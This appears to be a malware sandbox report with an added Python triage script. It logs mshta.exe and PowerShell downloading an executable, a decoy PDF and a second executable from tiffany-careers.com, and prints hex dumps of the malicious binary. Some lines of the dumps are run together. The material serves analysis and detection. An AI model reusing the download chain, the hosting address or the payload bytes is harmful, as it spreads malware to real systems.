2024-12-27 08:05:23 UTC  16384              IN         Data Raw: 28 a2 8a 00 28 a2 ac d9 db 19 e6 c9 1f 22 f5 34 0a 52 51 57 66 9d 8c 66 3b 55 04 73 de aa ea 90 9c ac a0 7d 6b 48 70 30 29 b2 c6 b2 c6 c8 c3 83 54 79 f1 a9 69 f3 1c ed 15 2d c4 0d 04 a5 58 71 d8 d4 55 27 a0 9a 6a e8 28 a2 8a 06 14 51 45 00 6c 69 9f f1 e8 3f de 35 83 e2 fb 02 c2 3b d4 19 c7 ca d8 ec 2b 7b 4c ff 00 8f 31 fe f1 ab 17 36 e9 75 6e f0 c8 32 ae 30 6a 91 e6 d4 f8 d9 e5 94 55 ed 57 4c 97 4c bb 68 d8 1f 2c 9f 91 bd 6a 8d 51 21 45 14 50 01 45 14 50 07 6f e1 1f f9 05 bf fb f5 c8 ea 20 8d 46 70 47 f1 57 5d e1 1f f9 06 3f fb f5 85 e2 6b 26 b6 d5 1a 50 3f 77 28 ca 9a 42 31 68 a2 8a 63 0a 28 a2 80 0a 28 a7 24 6d 2c 8b 12 0c b3 9c 01 40 1d e7 85 94 ae 85 18 61 fc 46 b9 ff 00 12 5b 98 35 56 60 38 90 67 35 d8 69 d6 c2 d2 c6 28 71 c8 5e 7e b5 53 5d d3 3f b4
                                                                        Data Ascii: (("4RQWff;Us}kHp0)Tyi-XqU'j(QEli?5;+{L16un20jUWLLh,jQ!EPEPo FpGW]?k&P?w(B1hc(($m,@aF[5V`8g5i(q^~S]?
2024-12-27 08:05:23 UTC  16384              IN         Data Raw: 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 51 bb 4d b2 06 1d 0d 5e a6 49 18 91 0a 9f c2 80 33 28 a7 3a 34 6d b5 85 36 98 05 14 51 40 05 00 12 70 3b 9a 2a dd b4 04 1d ec 3e 82 80 2c 22 ec 8c 2f a0 ac d7 fb ed f5 ad 5e d5 94 ff 00 7d be b4 00 94 51 45 00 14 51 45 00 14 51 45 00 68 db 7f a8 5a c3 9f fe 3e 65 ff 00 78 d6 e5 bf fa 95 ac 39 ff 00 e3 e6 4f f7 8d 4b 3a 70 db b2 3a 28 a2 91 d8 14 51 45 00 14 76 a2 8e d4 01 b7 63 ff 00 1e 6b 58 f3 02 26 60 7d 6b 62 c3 fe 3d 56 a9 6a 36 e5 25 f3 40 f9 5b af d6 9f 43 96 94 92 a8 d3 28 d1 45 14 8e a0 a2 8a 28 00 a2 8a 92 08 4c f2 aa 0e 99 e4 d0 26 d2 57 26
                                                                        Data Ascii: Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@QM^I3(:4m6Q@p;*>,"/^}QEQEQEhZ>ex9OK:p:(QEvckX&`}kb=Vj6%@[C(E(L&W&
2024-12-27 08:05:23 UTC  16384              IN         Data Raw: e3 ae 07 7f 4a e3 3e 2b 69 9f db fe 0c b4 d6 ed 62 7c da e2 52 19 70 c2 37 1c e4 7b 71 5d 09 ea 73 bd 8e bd 08 f3 5b 9e 09 c8 f7 ad 18 8f 15 c0 f8 2f 5b 97 c4 3e 1d b3 74 ba 58 e7 b4 c4 37 6b b0 33 36 3e e9 c9 e8 08 ef 8a ee 21 7e 2a 5a b3 29 6c 58 ba b5 8a fa d2 4b 69 86 51 c6 3e 9e f5 e7 af 6e fa 66 ac 6d e5 e7 6b 6d 27 fb ca 7f fa c6 bd 15 5e bc e7 c7 de 22 d3 f4 7d 7e 18 ae ad 6e 64 91 e0 0e 1a 27 50 3e f1 1d fe 95 e4 e6 58 09 62 52 95 25 ef 2f c8 ef c1 62 d5 16 e3 37 ee b0 92 17 b9 d4 23 b2 88 64 ae 22 51 e9 eb fa e4 d7 7f a7 d8 c5 a7 59 25 bc 43 80 32 c7 fb c7 b9 af 34 f0 8f 8b 34 dd 57 c5 96 d6 f0 d9 dd ac d2 ef 21 e4 75 2a 3e 52 4f 41 5e a2 cd 4b 2d cb e5 87 72 9d 55 ef 3f c8 78 cc 5c 6b 28 c6 9b d1 7e 63 25 3c 56 74 ee aa 4b 33 61 57 2c c4 f6 02
                                                                        Data Ascii: J>+ib|Rp7{q]s[/[>tX7k36>!~*Z)lXKiQ>nfmkm'^"}~nd'P>XbR%/b7#d"QY%C244W!u*>ROA^K-rU?x\k(~c%<VtK3aW,
2024-12-27 08:05:23 UTC  16384              IN         Data Raw: 3c 4d dd a4 78 58 ec 8f 92 2e 74 35 f2 3d 56 8a 6a 3a c8 8a e8 c1 95 86 41 07 a8 a7 57 59 f3 8f 40 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 af 33 f8 8f aa c9 25 fc 5a 62 31 11 46 bb dc 03 f7 98 f4 fc 87 f3 af 4c af 22 f8 81 03 c5 e2 99 64 61 f2 cb 1a b2 fe 03 1f d2 b0 c4 36 a1 a1 eb e4 90 8c b1 6b 9b a2 67 2d 45 14 57 9e 7d a8 57 a5 7c 37 d5 64 9a da e3 4d 95 89 10 e1 e2 c9 e8 0f 51 f9 ff 00 3a f3 5a ee 3e 1a 42 ed aa 5e 4c 3e e2 44 14 fd 49 ff 00 eb 56 d4 1b 53 47 99 9c 42 32 c2 49 cb a1 e9 d4 51 45 7a 27 c3 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 15 4a f7 57
                                                                        Data Ascii: <MxX.t5=Vj:AWY@(((((((((((3%Zb1FL"da6kg-EW}W|7dMQ:Z>B^L>DIVSGB2IQEz'Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@JW
2024-12-27 08:05:23 UTC  16384              IN         Data Raw: 7e 43 63 df 8a e6 c4 42 52 b5 8f 7b 25 c5 d1 c3 f3 aa ae d7 b1 c3 51 5d af fc 2b 5d 53 fe 7e ed 7f f1 ef f0 a3 fe 15 ae a9 ff 00 3f 76 bf f8 f7 f8 57 37 b0 9f 63 de fe d5 c2 7f 39 89 e1 3f f9 1a b4 ff 00 fa eb fd 0d 7b 67 6a e0 bc 3d e0 2b 9d 37 57 8a f6 ee e6 36 58 4e e4 58 b3 c9 f7 c8 e9 5d ed 75 e1 e1 28 c6 cc f9 ac e7 13 4e bd 65 2a 6e e9 20 af 27 f8 8d ff 00 23 2c 7f f5 ec bf fa 13 57 ac 57 21 e2 cf 07 4b af 5d c5 79 6b 70 91 ca a9 e5 b2 c9 9c 11 92 47 4f ad 55 68 b9 42 c8 c7 2a af 0a 18 95 3a 8e c8 f2 8a 2b b5 ff 00 85 6b aa 7f cf dd af fe 3d fe 14 7f c2 b5 d5 3f e7 ee d7 ff 00 1e ff 00 0a e2 f6 13 ec 7d 5f f6 ae 13 f9 ce 2a bd a7 c1 df f2 29 d8 7f b8 7f 99 ae 2c 7c 35 d4 f2 33 77 6d 8e ff 00 7b fc 2b d1 34 9d 3d 74 ad 2e de c9 1c ba c2 bb 77 1e e6
                                                                        Data Ascii: ~CcBR{%Q]+]S~?vW7c9?{gj=+7W6XNX]u(Ne*n '#,WW!K]ykpGOUhB*:+k=?}_*),|53wm{+4=t.w
2024-12-27 08:05:23 UTC  16384              IN         Data Raw: fb 03 58 9c 41 1a b9 6b 69 dc fc a3 3d 50 fa 73 93 9f 7a f6 09 75 9d 32 1b 6f b4 c9 a8 da 2c 00 67 cc 33 2e df cf 35 e6 be 23 f8 27 65 7d 72 f7 3a 25 e8 b2 2e 72 6d e5 5d d1 8f a1 1c 81 ed cd 61 d9 fc 09 d4 da 61 f6 ed 5e ce 38 b3 cf 90 ac ec 7f 30 28 19 47 e2 7f 8c 57 c5 d3 7d 93 47 57 97 4b d3 bf 7b 2c e0 60 3b 12 17 3f 41 9c 0f ad 74 ff 00 01 ff 00 e4 11 ac 0f fa 78 4f fd 04 d7 49 2f c3 5d 36 0f 05 5e 78 7f 4b 6f 22 4b ad a6 4b a9 57 7b b9 04 1e 7a 7e 55 27 c3 ff 00 04 4d e0 ab 6b e8 65 bf 4b bf b4 ba b0 2b 1e cd b8 07 dc d0 23 b3 a2 8a 28 03 33 c4 56 cd 79 e1 8d 5a d5 06 5a 6b 39 a3 50 3d 4a 11 5f 3c fc 2e d6 6d 74 2f 1c 41 35 f4 a2 18 25 8d e0 69 1b 80 84 f4 cf e2 05 7d 33 5e 49 e2 af 82 e9 a9 6a 33 5f 68 97 b1 5a 99 98 bb db ce a7 60 63 fd d2 3a 0f
                                                                        Data Ascii: XAki=Pszu2o,g3.5#'e}r:%.rm]aa^80(GW}GWK{,`;?AtxOI/]6^xKo"KKW{z~U'MkeK+#(3VyZZk9P=J_<.mt/A5%i}3^Ij3_hZ`c:
2024-12-27 08:05:23 UTC  16384              IN         Data Raw: de ee 2b 9e a2 80 3d 52 09 e3 b9 85 65 89 83 23 0c 82 29 66 62 90 bb 0e a1 72 2b 8a f0 c6 aa d6 d7 62 d2 43 fb a9 0f cb 9e c6 bb 3b 8f f8 f6 93 fd d3 48 47 98 dd 3b 4d 77 2b c8 c5 98 b1 e4 d4 38 1e 95 24 df eb e4 ff 00 78 d3 29 8c 4c 0f 4a 30 3d 29 68 a0 04 c0 f4 a3 03 d2 96 8a 00 15 8c 4c 1d 0e 19 4e 41 15 e9 d6 12 34 9a 6c 12 39 cb 34 60 93 f8 57 98 37 dd 3f 4a f4 dd 37 fe 41 36 ff 00 f5 c8 7f 2a 4c 3a 99 12 b1 79 58 b7 27 34 dc 53 9f ef b7 d6 9b 50 7a 71 d8 31 46 28 a2 81 86 28 c5 14 50 00 38 39 1e b5 d0 5b 31 7b 74 63 d4 8a e7 eb 7a d4 e2 d1 09 f4 a6 8e 6c 4a d1 11 de 5e 7d 9d 76 af 2e 7f 4a c7 79 1e 53 97 62 69 d3 c8 64 9d 98 9e fc 54 74 1a 52 a6 a2 83 8a 31 45 14 8d 44 c0 a7 a4 8f 19 ca 31 1f 4a 6d 14 09 ab 9b 36 57 82 71 b1 f8 71 fa d5 ca e7 62 73
                                                                        Data Ascii: +=Re#)fbr+bC;HG;Mw+8$x)LJ0=)hLNA4l94`W7?J7A6*L:yX'4SPzq1F((P89[1{tczlJ^}v.JySbidTtR1ED1Jm6Wqqbs
2024-12-27 08:05:23 UTC  16384              IN         Data Raw: 5a d3 c6 61 c7 b5 00 66 51 41 e0 e0 d1 40 05 14 51 40 05 14 51 40 05 6a af dd 5f a5 65 56 aa fd d5 fa 50 02 d1 45 14 80 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a
                                                                        Data Ascii: ZafQA@Q@Q@j_eVPE((((((((((((((((((((((((((((((((((((((((((((((((((((((
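The session tables of this report show three fetches from tiffany-careers.com: mshta.exe (PID 8084) requesting /ghep2412_2, a path with no extension, and receiving a body that begins with the MZ signature under a response with no Content-Type header at all; powershell.exe (PID 7508) requesting /Project_Information.pdf, labelled application/pdf and starting with %PDF-1.5; and the same PowerShell process requesting /XKIZdXAs.exe, labelled application/x-executable and again starting with MZ (listed next). The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: it checks each session's body magic against the declared Content-Type, the requested filename and the requesting process, and looks at the request User-Agent. The session data is transcribed from this report; the script-host list, the accepted PE MIME types and the finding names are assumptions chosen for illustration.

```python
from __future__ import annotations

from dataclasses import dataclass

# Leading bytes that identify a body regardless of what the server claims.
MAGIC = {
    b"MZ": "pe",
    b"%PDF": "pdf",
    b"\x7fELF": "elf",
    b"PK\x03\x04": "zip",
}

# Assumed set of MIME types under which a PE body is at least honestly labelled.
PE_MIME = {
    "application/x-executable",
    "application/x-msdownload",
    "application/x-dosexec",
    "application/octet-stream",
}

# Assumed list of script hosts and LOLBins that should not be pulling executables off the web.
SCRIPT_HOSTS = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe",
}


@dataclass
class HttpSession:
    process: str                      # image path of the process that opened the socket
    path: str                         # request target
    request_headers: dict[str, str]   # lower-cased header name -> value
    response_headers: dict[str, str]  # lower-cased header name -> value
    body_prefix: bytes                # first bytes of the response body


def sniff(body_prefix: bytes) -> str:
    """Return the body type implied by its leading bytes, or 'unknown'."""
    for magic, kind in MAGIC.items():
        if body_prefix.startswith(magic):
            return kind
    return "unknown"


def analyse(session: HttpSession) -> list[str]:
    """Return triage findings for one session; an empty list means nothing stood out."""
    findings: list[str] = []
    kind = sniff(session.body_prefix)
    ctype = session.response_headers.get("content-type", "").split(";")[0].strip().lower()
    proc = session.process.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    filename = session.path.split("?", 1)[0].rsplit("/", 1)[-1]

    if kind == "pe":
        if not ctype:
            findings.append("pe-without-content-type")
        elif ctype not in PE_MIME:
            findings.append(f"pe-mislabelled-as:{ctype}")
        if "." not in filename:
            findings.append("pe-extensionless-path")
        if proc in SCRIPT_HOSTS:
            findings.append(f"pe-fetched-by:{proc}")
    elif kind == "pdf" and ctype and ctype != "application/pdf":
        findings.append(f"pdf-mislabelled-as:{ctype}")
    elif kind == "unknown" and ctype in PE_MIME:
        findings.append("declared-executable-unknown-magic")

    # A script host with no User-Agent (e.g. WebClient defaults) or with the
    # WinINet/MSHTML "MSIE" string is worth a second look either way.
    if proc in SCRIPT_HOSTS:
        ua = session.request_headers.get("user-agent")
        if ua is None:
            findings.append("script-host-no-user-agent")
        elif "MSIE" in ua:
            findings.append("script-host-msie-user-agent")
    return findings


# Transcribed from the three sessions in this report; each body prefix is the start
# of the first "Data Raw" line. Hand-copied, so treat as illustrative input.
SESSIONS = [
    HttpSession(
        process=r"C:\Windows\System32\mshta.exe",
        path="/ghep2412_2",
        request_headers={
            "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; "
                          "Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; "
                          ".NET CLR 3.0.30729; .NET CLR 3.5.30729)",
            "host": "tiffany-careers.com",
        },
        response_headers={"content-length": "441463", "server": "LiteSpeed"},
        body_prefix=b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00",
    ),
    HttpSession(
        process=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        path="/Project_Information.pdf",
        request_headers={"host": "tiffany-careers.com"},
        response_headers={"content-type": "application/pdf", "content-length": "382562"},
        body_prefix=b"%PDF-1.5\r\n%\xb5\xb5\xb5\xb5\r\n",
    ),
    HttpSession(
        process=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        path="/XKIZdXAs.exe",
        request_headers={"host": "tiffany-careers.com"},
        response_headers={"content-type": "application/x-executable", "content-length": "1083904"},
        body_prefix=b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00",
    ),
]


def run_report(sessions: list[HttpSession] | None = None) -> dict[str, list[str]]:
    """Map each request path to its findings."""
    return {s.path: analyse(s) for s in (SESSIONS if sessions is None else sessions)}


if __name__ == "__main__":
    for path, findings in run_report().items():
        print(f"{path:26} {', '.join(findings) or 'clean'}")
```

The mshta session collects four findings at once (PE body, no Content-Type, no extension, script host with an MSIE User-Agent); the PDF fetch is flagged only because PowerShell sent no User-Agent; the .exe fetch is flagged for the script host plus the missing User-Agent, since its Content-Type is consistent with the body.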


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.8  49711        147.45.49.155   443               7508  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-27 08:05:26 UTC  57                 OUT        GET /XKIZdXAs.exe HTTP/1.1
                                                                        Host: tiffany-careers.com
2024-12-27 08:05:26 UTC  439                IN         HTTP/1.1 200 OK
                                                                        etag: "108a00-676a8a80-23c52;;;"
                                                                        last-modified: Tue, 24 Dec 2024 10:18:40 GMT
                                                                        content-type: application/x-executable
                                                                        content-length: 1083904
                                                                        accept-ranges: bytes
                                                                        date: Fri, 27 Dec 2024 08:05:26 GMT
                                                                        server: LiteSpeed
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        connection: close
2024-12-27 08:05:26 UTC  16384              IN         Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 31 29 eb 2b 50 47 b8 2b 50 47 b8 2b 50 47 b8 9f cc b6 b8 3e 50 47 b8 9f cc b4 b8 b7 50 47 b8 9f cc b5 b8 0a 50 47 b8 b5 f0 80 b8 2a 50 47 b8 79 38 42 b9 05 50 47 b8 79 38 43 b9 3a 50 47 b8 79 38 44 b9 23 50 47 b8 22 28 c4 b8 23 50 47 b8 22 28 c0 b8 2a 50 47 b8 22 28 d4 b8 0e 50 47 b8 2b 50 46 b8 06 52 47 b8 8e 39 49 b9 7b 50 47 b8 8e 39 44 b9 2a 50 47 b8 8e 39 b8 b8 2a 50 47
                                                                        Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPG*PGy8BPGy8C:PGy8D#PG"(#PG"(*PG"(PG+PFRG9I{PG9D*PG9*PG
                                                                        2024-12-27 08:05:26 UTC16384INData Raw: c0 48 8d 45 20 48 8b d6 4c 8d 45 28 48 89 44 24 20 e8 5e f5 ff ff 85 c0 0f 88 96 70 04 00 48 8d 4d c0 e8 55 54 00 00 44 8b 45 20 e9 00 ff ff ff 48 8d 0d f9 ba 0e 00 e8 5c 09 00 00 33 c0 4c 8d 5c 24 70 49 8b 5b 30 49 8b 73 38 49 8b e3 41 5f 41 5e 5d c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8b ec 48 83 ec 70 41 8b 18 45 33 db ff cb 44 89 5d c8 4c 8b d1 89 5d b4 49 8b f8 4c 89 5d d0 c7 45 d8 01 00 00 00 41 8b cb 44 89 5d e0 45 8a cb 4c 89 5d e8 c7 45 f0 01 00 00 00 c7 45 b0 02 00 00 00 44 8b 07 41 8b d0 41 8d 40 01 89 07 e8 75 06 00 00 48 85 c0 74 2c 45 84 c9 75 27 48 8b 40 08 48 8b 10 66 44 39 5a 08 75 d7 8b 12 83 ea 0b 74 4f 83 fa 01 75 cb 85 c9 75 42 44 8a ca 44 89 45 b8 eb be 49 8d 8a 68 02 00 00 48 8d 55 b0 e8 98 07 00 00 8d 43 01 48 8d 4d e0 89 07 e8 de
                                                                        Data Ascii: HE HLE(HD$ ^pHMUTDE H\3L\$pI[0Is8IA_A^]H\$H|$UHHpAE3D]L]IL]EAD]EL]EEDAA@uHt,Eu'H@HfD9ZutOuuBDDEIhHUCHM
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 84 24 88 00 00 00 89 74 24 50 4d 8b c5 48 89 44 24 48 8b d7 8b 84 24 18 01 00 00 89 44 24 40 8b 84 24 20 01 00 00 89 44 24 38 8b 44 24 60 89 5c 24 30 44 89 74 24 28 89 44 24 20 e8 5c 00 00 00 48 8b b4 24 28 01 00 00 8b d8 48 8b ce e8 8e 87 00 00 48 8b ce c7 46 10 01 00 00 00 89 1e e8 59 73 00 00 85 c0 0f 84 71 49 04 00 83 ff 1d 74 08 49 8b cd e8 ac bf 01 00 45 33 f6 48 8d 4c 24 70 e8 5b 87 00 00 41 8b c6 48 81 c4 c8 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 48 8b c4 48 89 58 20 4c 89 40 18 48 89 48 08 55 56 57 41 54 41 55 41 56 41 57 48 8d 68 c1 48 81 ec 90 00 00 00 8b 3d e1 80 0e 00 45 33 ed 41 8b d9 44 8b fa 83 fa 0c 0f 84 33 49 04 00 83 fa 0d 7e 1b 83 fa 0f 0f 8e 25 49 04 00 83 fa 11 0f 84 1c 49 04 00 83 fa 14 0f 84 13 49 04 00 83 ff ff 0f 84 36
                                                                        Data Ascii: $t$PMHD$H$D$@$ D$8D$`\$0Dt$(D$ \H$(HHFYsqItIE3HL$p[AHA_A^A]A\_^][HHX L@HHUVWATAUAVAWHhH=E3AD3I~%III6
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: c1 89 83 c8 00 00 00 3b 53 1c 0f 8d e6 42 04 00 4c 63 9d 58 01 00 00 41 3b d3 0f 8f eb 42 04 00 8b 43 18 48 8b 7b 10 41 2b c1 49 63 d0 8b 04 87 89 04 97 41 8d 40 01 48 8b 7c 24 48 49 8b d7 48 2b 93 98 00 00 00 48 d1 fa 48 63 c8 48 8b 43 10 89 14 88 8b 95 48 01 00 00 45 3b d8 0f 8f 8e fb ff ff 45 8d 58 02 44 89 9d 58 01 00 00 e9 7e fb ff ff 83 ff 10 0f 85 39 03 00 00 8b 95 48 01 00 00 49 83 c6 06 e9 af fa ff ff 49 83 c6 02 83 c7 ab 49 8b ce 40 f6 c7 01 74 06 41 bd 01 00 00 00 46 0f be 9c 1f f8 80 0c 00 8b c7 48 8d 3d 4e 33 ff ff 44 89 5c 24 58 44 0f be 94 38 e8 80 0c 00 44 89 54 24 50 45 85 d2 75 0c b8 ff ff ff 7f 44 8b d0 89 44 24 50 bf 01 00 00 00 45 0f b7 0e 4c 8d 71 02 44 89 4c 24 54 41 8d 41 f1 83 f8 01 0f 86 da 6d 04 00 48 c7 c0 ff ff ff ff 8b c8 89
                                                                        Data Ascii: ;SBLcXA;BCH{A+IcA@H|$HIH+HHcHCHE;EXDX~9HIII@tAFH=N3D\$XD8DT$PEuDD$PELqDL$TAAmH
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 00 00 49 8b 0c df 49 8b d5 e8 16 40 01 00 49 89 3c df 48 ff c3 49 3b de 72 e8 4c 8b 6c 24 48 e9 cf fa ff ff 4c 8d 3d d5 f3 fe ff 49 8b 5c fd 00 48 85 db 74 61 48 8b 73 08 48 85 f6 74 36 48 8b 46 18 ff 08 48 8b 46 18 44 39 30 75 16 48 8b 0e e8 cf 3f 01 00 48 8b 4e 18 ba 04 00 00 00 e8 c1 3f 01 00 ba 20 00 00 00 48 8b ce e8 b4 3f 01 00 4c 89 73 08 8b 43 10 83 f8 05 0f 8d f6 00 00 00 b8 01 00 00 00 44 89 33 48 8b cb 89 43 10 8d 50 17 e8 8e 3f 01 00 4d 89 74 fd 00 48 ff c7 49 3b fc 72 88 e9 62 fa ff ff 44 8b 5c 24 40 45 33 c0 48 8b 9d a8 00 00 00 e9 ac f6 ff ff 41 83 e9 01 0f 88 dd fa ff ff 41 ff c2 41 ff c0 e9 a0 fa ff ff 48 8b 9d b0 00 00 00 48 8b cb c6 00 00 e8 fd 06 00 00 49 8b c7 89 43 10 33 c0 89 03 e9 93 f8 ff ff 49 8b 0a 48 8b 17 48 85 c0 74 20 44 0f
                                                                        Data Ascii: II@I<HI;rLl$HL=I\HtaHsHt6HFHFD90uH?HN? H?LsCD3HCP?MtHI;rbD\$@E3HAAAHHIC3IHHt D
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: e8 db c7 ff ff 48 8d 15 94 9e 0d 00 49 8b cc e8 dc 05 00 00 c6 44 24 51 00 e9 86 fd ff ff 80 7c 24 51 00 0f 85 89 aa 04 00 49 8b dc e9 93 fd ff ff 44 8b 6c 24 40 4c 8b 64 24 48 4c 8b 74 24 38 4c 89 64 24 58 4c 89 b5 88 00 00 00 45 85 ed 0f 84 c6 b6 04 00 41 83 fd 01 0f 85 d0 b6 04 00 49 8b d6 48 8d 4d 90 48 c7 45 98 00 00 00 00 e8 7d 05 00 00 48 8d 4d 90 e8 3c fe fe ff 84 c0 0f 85 75 02 00 00 83 fb 07 75 62 48 8b 55 78 4d 8b c7 e8 9b 94 00 00 85 c0 0f 88 f3 b8 04 00 83 fb 08 0f 84 a2 b6 04 00 41 83 fd 01 0f 85 b5 b6 04 00 49 8b de 48 8b cb e8 25 c7 ff ff c6 03 00 80 7c 24 34 00 c7 43 10 09 00 00 00 0f 85 ae b6 04 00 80 7d 88 00 0f 84 c6 b6 04 00 b0 01 48 ff cf 88 45 89 48 89 7c 24 78 88 44 24 34 48 8d 4d 90 e8 ec c6 ff ff 48 8b 7d 78 e9 fe ef ff ff 83 f8
                                                                        Data Ascii: HID$Q|$QIDl$@Ld$HLt$8Ld$XLEAIHMHE}HM<uubHUxMAIH%|$4C}HEH|$xD$4HMH}x
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 8d 05 6a eb 06 00 48 89 45 f0 48 8d 05 5f fb 09 00 48 89 05 d8 2f 0d 00 48 8d 05 41 ec 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 7a 2f 0d 00 c7 05 5c 2f 0d 00 01 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 d1 04 0a 00 48 89 05 ca 2f 0d 00 48 8d 05 4b f0 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 6c 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f5 05 0a 00 48 89 05 c6 2f 0d 00 48 8d 05 c7 f1 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 68 2f 0d 00 66 c7 05 ff 2e 0d 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 b8 ef 09 00 48 89 05 b9 2f 0d 00 48 8d 05 fe f3 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 5b 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f4 05 0a 00 48 c7 45 f8 00 00 00 00 0f 11 05 65 2f 0d 00 48 89 05 a6 2f 0d 00 48 8d 05 bb 5a 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 a0 f7 09
                                                                        Data Ascii: jHEH_H/HAHEz/\/EHEHH/HKHE)l/EHEHH/HHEh/f.EHEHH/HHE)[/EHEHHEe/H/HZEHEH
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 00 c7 05 89 12 0d 00 02 00 00 00 66 c7 05 84 12 0d 00 00 00 c7 05 9a 12 0d 00 02 00 00 00 c7 05 94 12 0d 00 02 00 00 00 66 c7 05 8f 12 0d 00 00 00 c7 05 a5 12 0d 00 02 00 00 00 c7 05 9f 12 0d 00 03 00 00 00 66 c7 05 9a 12 0d 00 00 00 c7 05 b0 12 0d 00 01 00 00 00 c7 05 aa 12 0d 00 01 00 00 00 66 c7 05 a5 12 0d 00 00 00 48 89 05 a6 12 0d 00 48 c7 45 f8 00 00 00 00 48 8d 05 73 6a 08 00 48 89 45 f0 48 8d 05 d4 a4 09 00 0f 10 45 f0 48 89 05 a9 12 0d 00 48 8d 05 72 6c 08 00 48 89 45 f0 48 8d 05 17 b0 09 00 48 89 05 b8 12 0d 00 48 8d 05 99 6e 08 00 48 c7 45 f8 00 00 00 00 0f 29 05 5a 12 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 8b b1 09 00 48 89 05 b4 12 0d 00 48 8d 05 81 ab fe ff 48 c7 45 f8 00 00 00 00 0f 11 05 56 12 0d 00 c7 05 34 12 0d 00 02 00 00 00 0f 10 45
                                                                        Data Ascii: ffffHHEHsjHEHEHHrlHEHHHnHE)ZEHEHHHHEV4E
